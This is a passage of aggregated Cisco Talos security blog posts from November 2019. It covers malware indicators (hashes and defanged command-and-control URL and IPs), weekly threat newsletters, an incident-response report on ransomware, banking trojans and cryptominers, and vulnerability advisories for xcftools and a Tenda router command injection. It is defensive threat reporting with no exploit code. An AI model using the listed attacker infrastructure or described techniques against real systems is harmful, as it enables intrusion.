                C:\Users\Dex Dexter\AppData\Local\Temp\tmpG766.tmp
                [%TempPath% + "\tmpG" + DateTime.Now.Millisecond + ".tmp"]

                Hashes executables:
                d076ed9b31172c37a0d6bafae0c18d559f62453f52c17d41dc2e24fd55a91e4a
                1c46332d2a0ab693ed1086f8ee78df47798361b4156619e2488cbb6851063373
                003ee7d88f3a04cfc1b96744b060170d80da75589c67deaf65adb02d45616bb5
                16f9a14d045fa28708710b5a089e1d1a361c8f5702a8574989b1935072c14a1d
                4030b864bcff5bd617e3be273387eec3857b019d20b59c8f2f0710f1b1876ede
                5246d87a5a69e7d50e7475bda5f9a74c3585188f0c937fcebebdf168043decd7
                59880d4c59643d7b268082696931dcbe966780eef072f1150d1ac65dbc95d222
                651c520971bc931dc3760b077a8ecd2fd3a7e4535afe2f0fd208168dc2a501e1
                694dcad0105052b3b74678a9c0e4ad3c17e8a3e87314863751296d58aa263b23
                a758516e200a5afb49ab2082c433fa59a8dbe2cf28973da6691a74759de479e1
                b61a6d30e268a406f52aca04cc2a82853968f3516e38d2b5522e9fa5d4c0d3f5
                e1954e26d6e82da6906441f30d133ad56b0154777128278d355365da475c4db4
                F7303285a2039ab934b696fec43e54fc5c8ab5c6332c62a78891da71f3c2fb82

                ARJ files:
                667519d5fea7b6137de2845dc900cf2813c8fd8c8476b107fe9a281e7aa5248d
                198dcc8511236212410e248d66c86236e1f23a79459a4c61aca5c8b913c9539c

                Related hashes:
                09dbe016c180e28b748f932805fc35170e348f3201d6939fc2b8368466c69315
                10739410391018cedb2bdf6804c4506ea256695935afc34be786894e5cc80602
                176d4d6ef5adb9655f63931914fe06688418d6ce62a3bbe6d6f09ccad53cca2f
                4059c87e8d39f69e1fb3bc5d094af1dafca73e8b662eb8d6bb850bfb10d1e92e
                421a642d23630ee480094dcb51f6ad6dc2430015d54cddbe0dbf299ee26869d4
                51aa560a3709127d26dfb9289ec7d9b020558a0ad33b638bbddfaab6b180d7c3
                61ee8edf4e9241ac3f5922547577e2c9b6a589b7402845be68c9e4bf377143b4
                754fcf3ef2216f15750393c9ee580d1de9bb8b5834532183a7ef09a109b3990f
                7a611fac9133845b29b73be71d1e08f2a82ee04a470b11bb0a25692da7c8caed
                82ef16248078738591cc548e611a8ce22cb6b30db3ce123bd2900b0ddf644dba
                94c3bbcf5af25417b755d9168cf6146b2de52658d8b909e0cdc38efde98df9fc
                96bad87dae87cb2c73ce0e2f092dc68adc02a09cc2f549d1a4f390e42c41bf08
                a2b174b1679d1a508c70acd2626e297c85aee3da5d50b5a0c7388960b6085c4a
                a5ddd6719e9ced4f18289103a47bf39ad0e221fcac7ce00ed8e7180865b3c63a
                aa295b39e3c9fbae2370bfc3bc03528a13fe5ee30d3497fff053fd4ab2ba790f
                b7d790f4e11364d50c32a0a36fe7c9e159073c905fb4462c8d95e31ea608ede5
                be7edfa65d420d6210b5e488b25ffe8a4fc1c37f9f358de97e0915d535766e74
                d5cd5875253dbabb6548d96a290e73d196f6db250af8c3ec316d855ef7660f5a
                da5d248dc77bd464c25fe5ad21ca62e58c69c4cc10cf27a13985432acfa6fd39
                ddee0696d2062e1706c368c5066392d56e804c707d6923397cf66d56d2016773
                de8fdea527ec9751531f15e727a7221103c5158bf14651faf19e648ec9652a0f
                e480512a207fc9809035b273dd6c35fcd6caf8829ce5b9d81cc82f2d3b2d5394
                e4b55be3eccbac57200e1c5e56d324afa23fdb8b12aba8d5be235b083b5afe0d
                f05329ffcf221c72570e214a62fb8f04633c8d9e405a4278fd9360e738d9d779
                f39c3cea5b1edcc71db1eb140b21f2aa56d9aee87c6d77528b84697aa9b19739
                f6f35c3cbf83450d1fecb7101784e6cc89fa13b994ae16199087c2c5119984d3
                fc2e81038c1cf19c40b9586889197446b426e8e4ed208931a616d838448fdd23
                fc7cf41f41bb94253d946d5db29d65697464772af341e9a2bb20dffb943e716e
                fe56eb80eb5b119b5c4e56811592029c4d8674061d4fbe89f8174cc4b403cfbf

                URLs:
                hxxp://premacorceb[.]com[/]drug[/]five[/]fre.php
                hxxp://www[.]ibsensoftware[.]com/

                IPs:
                194[.]147[.]32[.]237
                194[.]58[.]111[.]187


                Threat Source newsletter (Nov. 14, 2019)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                It was all about the bugs this week. Patch Tuesday was especially busy for us, including our usual recap of all the vulnerabilities Microsoft's security update this month (two of which we discovered). On top of that, we also disclosed a remote code execution vulnerability in some Intel graphics drivers and another in Exhibitor’s web user interface.

                We also recently discovered a wave of actors using living-off-the-land binaries to keep their malware from being detected. We run through how to detect these so-called “LoLBins,” and walk through some campaigns where we’ve seen them being used in the wild.

                And, as always, we have our latest Threat Roundup with runs through the top threats we’ve seen (and blocked) over the past week.

                Upcoming public engagements with Talos

                Event: “It’s Never DNS…. It Was DNS: How Adversaries Are Abusing Network Blind Spots”  at SecureWV/Hack3rCon X
                Location: Charleston Coliseum & Convention Center, Charleston, WV
                Date: Nov. 15 - 17
                Speakers: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Event: “Reading Telegram messages abusing the shadows” at BSides Lisbon 
                Location: Auditorio FMD-UL, Lisbon, Portugal
                Date: Nov. 28 - 29
                Speakers: Vitor Ventura
                Synopsis: One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications.

                Event: “Signed, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks” at CactusCon
                Location: Charleston Coliseum & Convention Center, Charleston, WV
                Date: Dec. 6 - 7
                Speakers: Edmund Brumaghin and Earl Carter
                Synopsis: This talk will discuss the common techniques we’re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future.

                Cyber Security Week in Review

                • Microsoft says it will honor new privacy protections offered in a California law across the entire U.S. Under the California Consumer Privacy Act, companies must inform users of what personal data they’re collecting, if that data is being sold and to whom, and users can opt out of any sales.  
                • Adobe patched three critical vulnerabilities as part of its monthly security update, including two in Adobe Media Encoder. There were also eight other bugs disclosed that Adobe considered “important.” 
                • Intel’s Cascade Lake line of CPUs are vulnerable to the Zombieload v2 exploit. The company released a security update this week to address these issues, but the evolution in the attack proves it can target more recent hardware. 
                • Google reportedly has collected health care data on millions of Americans without their knowledge. The tech giant works with Ascencion health care to to amass records across 21 states in an initiative codenamed “Project Nightengale.” 
                • Britain’s Labour political party was hit with two cyber attacks this week, both distributed denial-of-service campaigns. Labour officials say they have not confirmed there was any data breach. 
                • Mexican company Petroleos Mexicanos says it will have to switch to manual billing after a ransomware attack. The company, known as “Pemex,” says its employees still cannot access their emails or internet more than 24 hours later. 
                • Facebook is expanding its efforts to crack down on spam messages on its platform, shortly after its sister company Instagram did the same. However, attackers have still been successful at compromising accounts, and then using those accounts to purchase thousands of dollars in ad space. 
                • The U.S. Federal Trade Commission is suing a Utah-based company for failing to detect a data breach for more than 22 months. The infection didn’t become apparent until the targeted company ran out of hard drive space, which was actually stuffed with the attacker’s data archive.  
                • A new app promises to alert users if their iPhone has been hacked. The software is designed to scan for the “side effects” commonly caused by iPhone hacks and jailbreaks. 
                • The well-known APT33 hacking group from Iran has established its own VPN and has at least 22 nodes operating. The group is perhaps most well-known for developing the Shamoon disk-wiping malware. 

                Notable recent security issues

                Title: Microsoft disclosed 13 critical bugs as part of monthly security update
                Description: Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday discloses 75 vulnerabilities, 13 of which are considered "critical," with the rest being deemed "important." This month’s security update covers security issues in a variety of Microsoft services and software, including the Scripting Engine, the Windows Hyper-V hypervisor, and Win32. Cisco Talos discovered one of these vulnerabilities, CVE-2019-1448 —a remote code execution vulnerability in Microsoft Excel. 
                Snort SIDs: 46548, 46549, 52205 - 52209, 52212, 52213, 52216, 52217 - 52225, 52228 - 52234, 52239, 52240

                  

                Title: LEADTOOLS toolkit contains several vulnerabilities, including remote code execution 
                Description: Cisco Talos recently discovered multiple vulnerabilities in the LEADTOOLS line of imaging toolkits. LEADTOOLS is a collection of toolkits designed to perform a variety of functions aimed at integrating documents, multimedia and imaging technologies into applications. All of the software is produced by LEAD Technologies Inc. LEADTOOLS offers prebuilt and portable libraries with an SDK for most platforms (Windows, Linux, Android, etc.), that are all geared toward building applications for medical systems. Various pieces of LEADTOOLS contain vulnerabilities that could be exploited by malicious actors to carry out a number of actions, including denial-of-service conditions and the execution of code remotely.
                Snort SIDs: 50824 - 50827, 51930-51938, 51447, 51448

                Most prevalent malware files this week

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
                MD5: 47b97de62ae8b2b927542aa5d7f3c858
                Typical Filename: qmreportupload
                Claimed Product: qmreportupload
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 6b01db091507022acfd121cc5d1f6ff0db8103f46a1940a6779dc36cca090854
                MD5: 74f4e22e5be90d152521125eaf4da635
                Typical Filename: jsonMerge.exe
                Claimed Product: ITSPlatform
                Detection Name: W32.GenericKD:Attribute.22lk.1201

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG

                SHA 256: 85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5
                MD5: 8c80dd97c37525927c1e549cb59bcbf3
                Typical Filename: Eternalblue-2.2.0.exe
                Claimed Product: N/A
                Detection Name: W32.WNCryLdrA:Trojan.22k2.1201

                How the new Talos IR Cyber Range can prepare your employees for a cyber attack

                $
                0
                0
                By Gerard Johansen, Charles Iszard and Luke DuCharme.

                With the surge of ransomware attacks, information leaks and other cyber attacks in the headlines, most companies and organizations are aware that their employees need to be trained on how to stay safe online. But the real challenge lies in how to develop these pieces of training and tools in-house to build the necessary muscle memory to prevent and respond to an event.  Sending an analyst or two to a distant location for training depletes travel and training budgets, and when they return, there is little time to transfer this knowledge back to colleagues or managers.

                Vendor-provided training focuses on the vendor’s proprietary technology and often neglects the concepts that need to be incorporated into an organization’s ability to respond.

                To address these issues, Cisco Talos Incident Response (CTIR) created an interactive Cyber Range focused on Incident Response. This immersive experience is designed and delivered by incident response professionals for security professionals who need to increase their competency and muscle memory in incident response-related tasks.


                CTIR Cyber Range is a comprehensive, three-day training exercise that utilizes a crawl-walk-run methodology. Students start by being shown various tools and techniques, then apply them to a real-world scenario. This step-by-step process allows students to build the skills necessary to tackle the next challenge, a guided scenario.

                On the final day, the students are tasked with responding to a real-world attack scenario, during which they are required to periodically brief key stakeholders, identify a root cause, and brief their leadership – all while working collaboratively as a team to overcome the various challenges within the scenario.

                CTIR Cyber Range includes several key features that were designed to develop the skills necessary to address security incidents. First, CTIR developed a self-contained network infrastructure that is brought onsite to the customer. This allows CTIR to conduct the Cyber Range without the need to connect to external infrastructure, thereby removing latency or outage issues that often arise with those types of methods.

                A second key feature is the inclusion of real-world adversary tactics, techniques, or procedures (TTPs) conducted against real targets – the same tactics that CTIR responds to on a daily basis.  Customers have to work through a realistic network with production operating system targets.  The incorporation of current adversary TTPs provides the students with the most realistic experience.  Coupled with a completely isolated infrastructure, students examine realistic malware and exploits in a safe environment without the additional risk of unintentionally infecting their own network.

                One area of concern customers often have when working within a commercial cyber range is the reliance on tools that are not included in their technology stack. But CTIR’s Cyber Range is designed to include a mix of open-source tools that provide necessary investigative features while focusing on the methodology and techniques of incident response investigations. This focus on methods and concepts instead of tools provides the students a way to transfer their newly acquired skills to their existing or anticipated tools.

                Teamwork is a crucial component in any security operations environment. Likewise, the Cyber Range not only focuses on technical skills but also on those soft skills that are essential during an incident — such as answering calls from the CEO about the incident, delegating tasks, updating other stakeholders, and providing a final briefing. These tasks, along with working through the evidence as a team, build team cohesion and the ability to solve complex incident investigations together.

                The final component to the Cyber Range is the immersive student experience. As students work through the various exercises, CTIR instructors are there every step of the way. First, as instructors/mentors, then as the course progresses, to provide guidance where necessary, and answer questions as incident response professionals who execute these techniques on a daily basis. Small class sizes also ensure each student is given the appropriate level of attention and each experience is beneficial leading up to the student capstone exercise at the end of the day.


                The CTIR Cyber Range is a unique experience that combines the expertise of incident response professionals, realistic attacks, current TTPs, and teamwork. Through this exercise, organizations can incorporate skills and processes that will aid in the proper response to an incident and reduce its potential impact. For more information on the cyber range, inquire about a CTIR retainer.

                Cryptominers, ransomware among top malware in IR engagements in Q4

                $
                0
                0

                By David Liebenberg and Kendall McKay.

                This summer’s most popular malware families were commonly seen, unsophisticated attacks, with phishing being the top infection vector, according to Cisco Talos Incident Response (CTIR) data. In addition to threat actors repeatedly deploying common threats like ransomware as final payloads, we found that adversaries also leveraged similarly well-known open-source frameworks post-compromise to enable activities such as traversing victim networks, reaching out to command and control (C2) nodes, and exfiltrating data. These findings indicate that organizations across a variety of industry verticals continue to face challenges in defending against common threats and attack methods, most of which have the potential to cause critical damage if not detected and remediated quickly and effectively.

                The discoveries outlined in this blog were observed during CTIR engagements between May and July, which corresponds to Cisco’s fourth quarter in fiscal year 2019. These reports, which we intend to publish quarterly, are intended to provide executives and network defenders with regular updates and analysis on the threat landscape.

                Top threats

                The top threats that we observed between May and July included ransomware, commodity banking malware such as Emotet and Trickbot, and illicit cryptocurrency miners. Although adversaries’ use of ransomware initially appeared to slow down following the rise of cryptocurrency miners, ransomware was by far the most commonly observed threat in incident response engagements during the time period in question. We also frequently saw commodity banking trojans acting as a dropper for ransomware.

                Ransomware

                Based on our findings, ransomware was the most common threat affecting organizations, with Ryuk being the most frequently deployed type of ransomware. Ryuk infections targeted companies in the retail, media and entertainment, software and internet, and healthcare industries, severely impacting business-critical services and operations. In at least one case, the Ryuk infection occurred months after the initial Trickbot compromise, indicating that the threat actor avoided detection and maintained access to the victim system for a prolonged period of time.

                In most of our incident response engagements, we observed multiple threats being deployed on victim systems at various stages of the operation. Ryuk, for example, was typically dropped by banking trojans such as Trickbot, which is consistent with the ransomware’s known TTPs. In one such incident, a company experienced a Trickbot-Ryuk infection, after which the adversary used the open-source framework PowerShell Empire to pull down Sodinokibi ransomware binary code from a Pastebin page.  However, some Ryuk infections were not accompanied by a commodity malware dropper. One such company was infected with Ryuk via a malicious decoy Microsoft Word install, causing Microsoft Exchange servers and domain controllers to lose availability and impacting business operations.

                Banking trojans

                Modular banking trojans were also observed in several incident response engagements, often as a dropper for ransomware. The most commonly observed variants were Emotet and Trickbot. Other banking trojans observed between May and July included Qakbot, Cridex and Dridex and affected organizations in the retail, business services, media and entertainment, software and internet, manufacturing and health care industries.

                As mentioned above, several incident response engagements involved Trickbot dropping Ryuk. During at least one case, in which the adversary used PSExec and RDP to stage, spread, and execute the malware, the infection was widespread and progressed over time. Emotet was also observed in several engagements this past quarter. In one instance, a manufacturing company fell victim to an Emotet infection that was caused by malicious spam sent from one of their regional offices. An employee received a high-quality spoofed email that appeared to come from another employee and contained a malicious attachment, which likely led to an Emotet infection.

                The actors behind banking trojans such as Trickbot and Emotet have shown a willingness to continually update their malware, adding new modules for increased lateral movement and data exfiltration. They also have been increasing commodification of their malware, engaging in malware-as-a-service by providing access to their tools and infrastructure to other malicious actors. Given adversaries’ propensity to target enterprise networks, they remain a consistent threat observed by responders.

                Coinminers

                Between May and July, we observed a number of illicit cryptomining attacks in our telemetry and CTIR engagements, several of which involved prominent Chinese botnets and the collaboration of multiple threat actors. Cryptomining malware was observed in CTIR engagements with organizations in the education, health care, business services, telecommunications, and retail industries. Following a dramatic drop in cryptocurrency values in 2018, the market appears to be slowly rebounding with gradual price increases since in early 2019. Despite the fluctuating market, threat actors have largely remained undeterred from targeting cryptocurrency exchanges, suggesting that the currency’s monetary value has little to do with their decision to carry out these types of attacks. As the value of cryptocurrencies continue to rise, we expect illicit cryptoming attacks to remain constant  and possibly increase in frequency.

                Prominent Chinese cryptocurrency botnets were observed in several engagements. A company in the business services industry had an internet-facing server exploited and was infected with malware associated with cybercriminal group Rocke. The threat actor, which Cisco Talos wrote about in 2018, is linked to the Iron cybercrime group that actively engages in distributing and executing cryptocurrency mining malware using a varied toolkit that includes Git repositories, HTTP FileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, and ELF and PE miners. Talos first observed this actor when they attacked our honeypot infrastructure.

                In another engagement, a telecommunications company was compromised with a Monero miner associated with another prominent Chinese-language botnet that Talos has been following since February 2019. This actor had been observed exploiting unsecured ElasticSearch clusters to drop cryptocurrency miners, as well as targeting Oracle WebLogic and Hadoop YARN. During the CTIR engagement, the actor conducted a brute-force authentication attack, after which automated adversary scanners attempted to install cryptocurrency mining malware. Several Hadoop virtual machines (VM) became infected with mining malware that reached out to a known C2 used by the group.

                Our findings also indicated that mining malware is usually delivered by relatively unsophisticated means such as mass exploitation campaigns or brute-forcing. These types of common infection vectors are often used by various other threat actors to carry out a range of unrelated threat activity, suggesting that the presence of mining malware can sometimes be an indication that more sophisticated malware is also present on the victim’s environment.

                Top entry vectors 

                We were unable to determine the entry vector during the majority of engagements due to the victim organization having insufficient logging and security instrumentation. However, when the entry vector could be reasonably determined or assumed, phishing, brute-forcing and exploitation of web applications were the most frequent entry methods.

                Phishing  

                With the prevalence of banking trojans that mostly spread via malspam and phishing campaigns, it should be no surprise that email was one of the top initial vectors we observed. Several engagements saw Emotet and Trickbot delivered via malicious emails. This included emails sent from one victim within an organization to another, which can make detecting a phishing incident much more difficult by both the victim and security appliances.

                Brute-force

                Brute-force attacks occur when an attacker continuously attempts to log in to an application until they find the correct ID-password combination that grants them access. These processes are typically automated and happen at a rapid pace. In addition to our CTIR team uncovering evidence of brute-force attacks in their engagements, we also frequently observed this type of activity in our Talos honeypot infrastructure.

                Web application compromise

                Another common initial vector was the exploitation of unpatched internet-facing applications. Threat actors commonly scan for unpatched servers to exploit using publically available proofs-of-concept soon after vulnerabilities are announced. We frequently observed this activity in our telemetry and have seen it in incident response engagements as well. For instance, a business services company had cryptocurrency miners dropped onto their environment after actors exploited vulnerabilities in their Jenkins servers, while an organization in the education industry had their SharePoint servers breached with a web shell.

                Actions after compromise

                In addition to completing their primary objectives – for example, encrypting files during a ransomware attack – we observed threat actors carrying out a variety of secondary actions post-compromise,  such as reaching out to a C2 for follow-on malware or instructions, traversing the network, compromising user accounts, establishing persistence and exfiltrating data. This type of malicious activity after compromise shows how adversaries can leverage common and relatively unsophisticated tactics, including the use of widely available open-source tools, to carry out successful operations.

                Cisco Talos also observed some common lateral movement methods. For instance, we frequently observed exploitation of SMB and internal spam as a means of a lateral movement, typical actions of banking trojans such as Trickbot and Emotet. We also observed attackers in several engagements leveraging readily available open-source post-exploitation tools to traverse the network and execute malware. This includes Mimikatz, a post-exploitation tool that dumps passwords from memory, as well as other sensitive data.

                We also observed PowerShell Empire, an open-source post-exploitation framework that leverages PowerShell and includes modules ranging from keyloggers to credential dumpers, to execute malware, traverse the network, and reach out to C2s. Defenders should not underestimate the damage an attacker can cause through the use of these tools. Evidence of Mimikatz in particular potentially indicates that an organization’s critical services may be severely compromised. During an engagement with a manufacturing company, we observed the presence of Mimikatz in a local administrator account’s remote interactive session. We also found compromised accounts from this organization and another CTIR response victim for sale on the dark web.

                We also observed common persistence techniques such as establishing a cron job to reach out to the payload hosting domain and execute the payload, installing multiple copies of a payload on a host, creating scheduled tasks, and creating registry keys in the Autorun locations in the registry.

                Multiple actors compromising the same victim

                An organization vulnerable to compromise may be attacked by multiple adversaries, each with different objectives, and these adversaries may even battle one another for control of the victim network. In one instance, we observed a malicious threat actor named Rocke, another cryptomining actor named Watchbog, as well as the longrunning China.Z botnet on the same victim. In another case, we observed a ransomware event that ran parallel to an adversary who had compromised credentials via Mimikatz. During a ransomware event, a second adversary compromised the victim’s externally facing SSH server to drop IoT botnet malware. It is important to consider the implications of finding multiple actors, mainly how organizations can address the underlying security weaknesses to prevent these attacks as well as improvements in visibility to help increase detection.

                This one reason why a common threat, like a ransomware event, banking trojan outbreak, or illicit mining attack can be considered a canary in the coal mine, showing that a low-effort, low-sophistication attack successfully bypassed an organization’s defenses, which could indicate the presence of other actors.

                What to watch for and mitigations

                The fact that these common threats prevail shows that adversaries are able to take advantage of typical weaknesses in an organization’s security architecture. Since phishing was a top entry vector, Talos urges a multi-pronged approach to address email security, including user training (how to identify and report suspected phishing), technical anti-spoofing controls, intelligence-based email security filtering, and configuring end-points to be less vulnerable to common attacks.

                The lack of monitoring for deployed network detection tools/systems was a key weakness as well. This was especially true in some of these incidents where tools like Cisco AMP were deployed in “audit” mode but were not being reviewed by a person or aggregated into SIEM software.

                Post-compromise, the lack of logging was a weakness present in almost every engagement. A lack of logging makes it difficult for responders to put together a complete picture of what adversaries achieved post-compromise. This was also one of the reasons why in the majority of engagements we were unable to exactly pinpoint the initial vector of attack.

                Other common weaknesses we observed included lack of multi-factor authentication, sensitive servers exposed to the internet or not properly segmented, lack of patching, and ineffective security products.

                Beers with Talos Ep. #66: I Choose YOU! Attackers view of targets, RLAs, scam season

                $
                0
                0
                By Mitch Neff.

                Beers with Talos (BWT) Podcast episode No. 66 is now available. Download this episode and subscribe to Beers with Talos:

                If iTunes and Google Play aren't your thing, click here.

                Recorded Nov. 8, 2019 

                Joel is out on PTO, so Mitch, Matt, Nigel, and Craig carry the banner this episode discussing how attackers approach targets like investors look at portfolios. We also talk about how the most recent off-cycle elections in the US give us a glimpse of improvements and changes in election security. Finally, we take a quick look at popular scams and how attackers use seasonality to increase the relevance of their scams for emotional responses.

                The timeline:

                • 01:40 — Roundtable: Minds blown over planetary mechanics and the existence of Instapots.
                • 14:15 —How attackers are looking at targets: defending from different attackers.
                • 23:00 — Election security: A quick look at recent improvements and Mitch’s tin-foil hat.
                • 33:40 — Welcome to scam season! How attackers use emotion to increase effectiveness.
                • 41:40 — Closing thoughts and parting shots.

                Some other links:

                ==========

                Featuring: Craig Williams (@Security_Craig), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
                Hosted by Mitch Neff (@MitchNeff)

                Subscribe via iTunes (and leave a review!)


                Subscribe to the Threat Source newsletter


                Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

                Vulnerability Spotlight: Two remote code execution vulnerabilities in Xcftools

                $
                0
                0

                Claudio Bozzato of Cisco Talos discovered these vulnerabilities. 

                Xcftools contains two remote code execution vulnerabilities in its flattenIncrementally function. Xcftools is a set of tools for handling Gimp’s XCF files. The software provides tools to extract information from an XCF file, and then converting XCF files into a PNG or PNM file. An attacker could exploit these bugs by tricking a user into opening a specially crafted XCF file.

                Cisco Talos is disclosing these vulnerabilities after xcftools failed to patch them per Cisco’s 90-day deadline. Read more about the Cisco vulnerability disclosure policy here.

                Vulnerability details

                xcftools flattenIncrementally tiles walk code execution vulnerability (TALOS-2019-0878/CVE-2019-5086)

                An exploitable integer overflow vulnerability exists in the flattenIncrementally function in the xcf2png and xcf2pnm binaries of xcftools, version 1.0.7. An integer overflow can occur while walking through tiles that could be exploited to corrupt memory and execute arbitrary code. In order to trigger this vulnerability, a victim would need to open a specially crafted XCF file.

                Read the complete vulnerability advisory here for additional information.

                xcftools flattenIncrementally rows allocation code execution vulnerability (TALOS-2019-0879/CVE-2019-5087)

                An exploitable integer overflow vulnerability exists in the flattenIncrementally function in the xcf2png and xcf2pnm binaries of xcftools 1.0.7. An integer overflow can occur while calculating the row's allocation size, that could be exploited to corrupt memory and eventually execute arbitrary code. In order to trigger this vulnerability, a victim would need to open a specially crafted XCF file.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that xcftools version 1.0.7 is affected by these vulnerabilities.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 43857 - 43860, 50842 - 50845

                Vulnerability Spotlight: Tenda AC9 /goform/WanParameterSetting command injection vulnerability

                $
                0
                0

                Amit Raut of Cisco Talos discovered this vulnerability.

                Cisco Talos recently discovered a command injection vulnerability in the Tenda AC9 router. The Tenda AC9 is one of the most popular and affordable dual-band gigabit WiFi Router available online, especially on Amazon. A command injection vulnerability exists in the
                `/goform/WanParameterSetting` resource. A locally authenticated attacker can execute arbitrary commands to post parameters to execute commands on the router. The attacker can get reverse shell running as root using this command injection.

                Cisco Talos is disclosing this vulnerability after Tenda failed to patch it per Cisco’s 90-day deadline. Read more about the Cisco vulnerability disclosure policy here.

                Vulnerability details

                Tenda AC9 /goform/WanParameterSetting command injection vulnerability (TALOS-2019-0861/CVE-2019-5071, CVE-2019-5072)

                An exploitable command injection vulnerability exists in the /goform/WanParameterSetting functionality of Tenda AC9 Router AC1200 Smart Dual-Band Gigabit WiFi Router (AC9V1.0 Firmware V15.03.05.16_multi_TRU). A specially crafted HTTP POST request can cause a command injection, resulting in code execution. An attacker can send a specific HTTP POST request with a command to trigger this vulnerability.

                Read the complete vulnerability advisory here for additional information.

                Versions tested

                Talos tested and confirmed that AC9V1.0, firmware, versions 15.03.05.16_multi_TRU and 15.03.05.14_EN are affected by this vulnerability.

                Coverage

                The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

                Snort Rules: 50782 - 50785

                Threat Source newsletter (Nov. 21, 2019)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                It’s nearly holiday shopping season, which means it’s prime scam season. On the latest Beers with Talos episode, we run down the best ways to stay safe while shopping online and how to detect phony emails. It’s also election season, which makes for some good discussion.

                And, as it’s time to look back on the year that was, we have a new feature from Talos Incident Response where we take a quarter-by-quarter look at the top threats we’ve seen in the wild. In Q4 of Cisco’s fiscal year, our IR analysts mainly saw ransomware and cryptocurrency miners.

                IR also had another exciting announcement this week, with the unveiling of a new cyber range that can help train employees to avoid common scams that can lead to malware infection. The cyber range now comes with any IR retainer.

                The Threat Source newsletter is getting a week off next week for the Thanksgiving holiday in the U.S., so we’ll talk to you again in December.

                Upcoming public engagements with Talos

                Event: “Reading Telegram messages abusing the shadows” at BSides Lisbon 
                Location: Auditorio FMD-UL, Lisbon, Portugal
                Date: Nov. 28 - 29
                Speakers: Vitor Ventura
                Synopsis: One of the cornerstones of privacy today is secure messaging applications like Telegram, which deploy end-to-end encryption to protect the communications. But several clone applications have been created and distributed with the intent of spying on their users. In this talk, Vitor will demonstrate how the Telegram registration process became abused, allowing message interception on non-rooted Android devices without replacing the official application. This is another example on how encryption is not a panacea, and that side-channel attacks like this are a real problem for otherwise secure applications.

                Event: “Signed, Sealed, Compromised: The Past, Present, and Future of Supply Chain Attacks” at CactusCon
                Location: Charleston Coliseum & Convention Center, Charleston, WV
                Date: Dec. 6 - 7
                Speakers: Edmund Brumaghin and Earl Carter
                Synopsis: This talk will discuss the common techniques we’re seeing in supply chain attacks. Supply chain attacks are a broad topic, but one that has continued to evolve and mature over the last decade. Nick and Edmund will walk through what a supply chain attack constitutes, the history of how these attacks have evolved, and where we see this attack technique moving in the future.

                Cyber Security Week in Review

                • The highly publicized Checkra1n jailbreak for iOS devices has been on the market for a week now. Here’s what that means for iPhone users and security researchers, and why it poses such an ethical dilemma.  
                • Google and Samsung recently patched a vulnerability in some of their smartphones that could allow an attacker to take over the device’s camera. But other Android devices may still be at risk. 
                • Several government services in Louisiana were taken down due to a ransomware attack. Two days post-infection, the state’s motor vehicles department was still closed. But state officials say no one has paid the ransom requested by the attackers. 
                • The Australian government released a proposal to secure internet-of-things devices. It is a voluntary code the country is asking companies to abide to, including devices like "everyday smart devices that connect to the internet, such as smart TVs, watches, and home speakers.” 
                • Numerous popular apps on the Google Play store are still vulnerable to long-known remote code execution vulnerabilities. A study found that while these apps do have recent updates, they don’t necessarily protect against publicly disclosed bugs. 
                • The Russian government is eager to bring an alleged hacker back into its country after he appeared in a U.S. court to face charges. Research indicates the man may be one of the most well-connected hackers in Russia and the government fears he knows too much. 
                • Microsoft says there is “no evidence” that the Dopplepaymer malware is spreading through Microsoft Teams. The company said after extensive research, it believes the only way Dopplemaymer can spread is through remote human operators using existing Domain Admin credentials. 
                • Many user accounts for the newly launched Disney+ streaming service have been stolen and listed for sale on the dark web. However, Disney says there is no evidence to indicate its servers were breached. 

                Notable recent security issues

                Title: New, custom dropped delivers variety of information-stealing malware 
